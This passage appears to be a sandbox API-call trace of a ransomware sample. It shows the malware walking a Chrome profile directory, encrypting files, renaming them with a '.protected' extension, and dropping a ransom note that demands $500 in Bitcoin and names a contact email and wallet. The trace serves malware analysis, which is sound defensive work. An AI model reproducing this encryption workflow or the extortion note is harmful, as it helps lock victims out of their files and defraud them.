\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.241] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0078.242] lstrlenA (lpString="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") returned 684 [0078.242] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 [0078.242] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.242] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, 
lpOverlapped=0x0) returned 1 [0078.242] CloseHandle (hObject=0x150) returned 1 [0078.242] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0078.242] lstrcmpiW (lpString1="Crashpad", lpString2="Windows") returned -1 [0078.242] lstrcmpiW (lpString1="Crashpad", lpString2="Program Files") returned -1 [0078.242] lstrcmpiW (lpString1="Crashpad", lpString2="Program Files (x86)") returned -1 [0078.242] lstrcmpiW (lpString1="Crashpad", lpString2="$Recycle.bin") returned 1 [0078.242] lstrcmpiW (lpString1="Crashpad", lpString2="System Volume Information") returned -1 [0078.242] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad") returned 80 [0078.242] lstrcmpW (lpString1="Crashpad", lpString2=".") returned 1 [0078.242] lstrcmpW (lpString1="Crashpad", lpString2="..") returned 1 [0078.242] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\*") returned 82 [0078.243] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0078.243] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.243] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.243] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.243] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.243] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.243] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\.") returned 82 [0078.243] lstrcmpW 
(lpString1=".", lpString2=".") returned 0 [0078.243] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0078.243] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.243] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.243] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.243] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.243] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.244] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\..") returned 83 [0078.244] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.244] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.244] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0078.244] lstrcmpiW (lpString1="metadata", lpString2="Windows") returned -1 [0078.244] lstrcmpiW (lpString1="metadata", lpString2="Program Files") returned -1 [0078.244] lstrcmpiW (lpString1="metadata", lpString2="Program Files (x86)") returned -1 [0078.244] lstrcmpiW (lpString1="metadata", lpString2="$Recycle.bin") returned 1 [0078.244] lstrcmpiW (lpString1="metadata", lpString2="System Volume Information") returned -1 [0078.244] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\metadata") returned 89 [0078.244] StrStrIW (lpFirst="metadata", lpSrch=".protected") returned 0x0 [0078.244] lstrcmpW (lpString1="metadata", lpString2="RESTORE_FILES.txt") returned -1 [0078.244] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0078.244] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, 
pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0078.244] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\metadata" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\crashpad\\metadata"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0078.245] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\metadata") returned 89 [0078.245] StrStrW (lpFirst="metadata", lpSrch=".txt") returned 0x0 [0078.245] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\metadata") returned 89 [0078.245] StrStrW (lpFirst="metadata", lpSrch=".rar") returned 0x0 [0078.245] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\metadata") returned 89 [0078.245] StrStrW (lpFirst="metadata", lpSrch=".zip") returned 0x0 [0078.245] ReadFile (in: hFile=0x154, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e544*=0x0, lpOverlapped=0x0) returned 1 [0078.245] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.245] WriteFile (in: hFile=0x154, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e544*=0x0, lpOverlapped=0x0) returned 1 [0078.245] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.245] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, 
nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0078.246] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0078.246] CloseHandle (hObject=0x154) returned 1 [0078.247] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\metadata.protected") returned 99 [0078.247] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\metadata" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\crashpad\\metadata"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\metadata.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\crashpad\\metadata.protected")) returned 1 [0078.247] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0078.247] lstrcmpiW (lpString1="reports", lpString2="Windows") returned -1 [0078.247] lstrcmpiW (lpString1="reports", lpString2="Program Files") returned 1 [0078.247] lstrcmpiW (lpString1="reports", lpString2="Program Files (x86)") returned 1 [0078.247] lstrcmpiW (lpString1="reports", lpString2="$Recycle.bin") returned 1 [0078.247] lstrcmpiW (lpString1="reports", lpString2="System Volume Information") returned -1 [0078.247] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\reports") returned 88 [0078.247] lstrcmpW (lpString1="reports", lpString2=".") 
returned 1 [0078.247] lstrcmpW (lpString1="reports", lpString2="..") returned 1 [0078.247] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\reports\\*") returned 90 [0078.247] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\reports\\*", lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0x47bb10 [0078.248] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.248] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.248] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.248] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.248] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.248] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\reports\\.") returned 90 [0078.248] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.248] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0078.248] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.248] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.248] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.248] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.248] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.248] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\reports\\..") returned 91 [0078.248] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.248] lstrcmpW 
(lpString1="..", lpString2="..") returned 0 [0078.248] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0 [0078.248] FindClose (in: hFindFile=0x47bb10 | out: hFindFile=0x47bb10) returned 1 [0078.248] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\reports\\RESTORE_FILES.txt") returned 106 [0078.248] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\reports\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\crashpad\\reports\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0078.249] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.249] WriteFile (in: hFile=0x154, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e2d4*=0x53d, lpOverlapped=0x0) returned 1 [0078.250] lstrlenA (lpString="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") returned 684 [0078.250] WriteFile (in: hFile=0x154, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e2d4*=0x2ac, lpOverlapped=0x0) returned 1 [0078.250] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.250] WriteFile (in: hFile=0x154, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e2d4*=0xb1, 
lpOverlapped=0x0) returned 1 [0078.250] CloseHandle (hObject=0x154) returned 1 [0078.250] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0078.250] lstrcmpiW (lpString1="settings.dat", lpString2="Windows") returned -1 [0078.250] lstrcmpiW (lpString1="settings.dat", lpString2="Program Files") returned 1 [0078.250] lstrcmpiW (lpString1="settings.dat", lpString2="Program Files (x86)") returned 1 [0078.250] lstrcmpiW (lpString1="settings.dat", lpString2="$Recycle.bin") returned 1 [0078.250] lstrcmpiW (lpString1="settings.dat", lpString2="System Volume Information") returned -1 [0078.250] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\settings.dat") returned 93 [0078.250] StrStrIW (lpFirst="settings.dat", lpSrch=".protected") returned 0x0 [0078.250] lstrcmpW (lpString1="settings.dat", lpString2="RESTORE_FILES.txt") returned 1 [0078.250] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0078.250] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0078.250] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\settings.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\crashpad\\settings.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0078.250] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\settings.dat") returned 93 [0078.250] StrStrW (lpFirst="settings.dat", lpSrch=".txt") returned 0x0 [0078.250] lstrlenW 
(lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\settings.dat") returned 93 [0078.251] StrStrW (lpFirst="settings.dat", lpSrch=".rar") returned 0x0 [0078.251] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\settings.dat") returned 93 [0078.251] StrStrW (lpFirst="settings.dat", lpSrch=".zip") returned 0x0 [0078.251] ReadFile (in: hFile=0x154, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e544*=0x28, lpOverlapped=0x0) returned 1 [0078.252] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffffd8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.252] WriteFile (in: hFile=0x154, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e544*=0x28, lpOverlapped=0x0) returned 1 [0078.252] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.253] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0078.253] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0078.253] CloseHandle (hObject=0x154) returned 1 [0078.253] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\settings.dat.protected") returned 103 [0078.253] MoveFileW 
(lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\settings.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\crashpad\\settings.dat"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\settings.dat.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\crashpad\\settings.dat.protected")) returned 1 [0078.254] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0078.254] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0078.254] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\RESTORE_FILES.txt") returned 98 [0078.254] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\crashpad\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0078.266] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.266] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0078.267] lstrlenA (lpString="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") returned 684 [0078.267] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 [0078.267] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.267] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, 
lpOverlapped=0x0) returned 1 [0078.268] CloseHandle (hObject=0x150) returned 1 [0078.269] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0078.269] lstrcmpiW (lpString1="Default", lpString2="Windows") returned -1 [0078.269] lstrcmpiW (lpString1="Default", lpString2="Program Files") returned -1 [0078.269] lstrcmpiW (lpString1="Default", lpString2="Program Files (x86)") returned -1 [0078.269] lstrcmpiW (lpString1="Default", lpString2="$Recycle.bin") returned 1 [0078.269] lstrcmpiW (lpString1="Default", lpString2="System Volume Information") returned -1 [0078.269] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 79 [0078.269] lstrcmpW (lpString1="Default", lpString2=".") returned 1 [0078.269] lstrcmpW (lpString1="Default", lpString2="..") returned 1 [0078.269] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\*") returned 81 [0078.269] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0078.280] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.280] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.280] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.280] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.280] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.280] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\.") returned 81 [0078.280] lstrcmpW (lpString1=".", 
lpString2=".") returned 0 [0078.280] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0078.282] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.282] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.282] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.282] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.282] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.282] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\..") returned 82 [0078.282] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.282] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.282] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0078.282] lstrcmpiW (lpString1="Cache", lpString2="Windows") returned -1 [0078.282] lstrcmpiW (lpString1="Cache", lpString2="Program Files") returned -1 [0078.282] lstrcmpiW (lpString1="Cache", lpString2="Program Files (x86)") returned -1 [0078.282] lstrcmpiW (lpString1="Cache", lpString2="$Recycle.bin") returned 1 [0078.282] lstrcmpiW (lpString1="Cache", lpString2="System Volume Information") returned -1 [0078.282] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache") returned 85 [0078.282] lstrcmpW (lpString1="Cache", lpString2=".") returned 1 [0078.282] lstrcmpW (lpString1="Cache", lpString2="..") returned 1 [0078.283] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\*") returned 87 [0078.283] FindFirstFileW (in: 
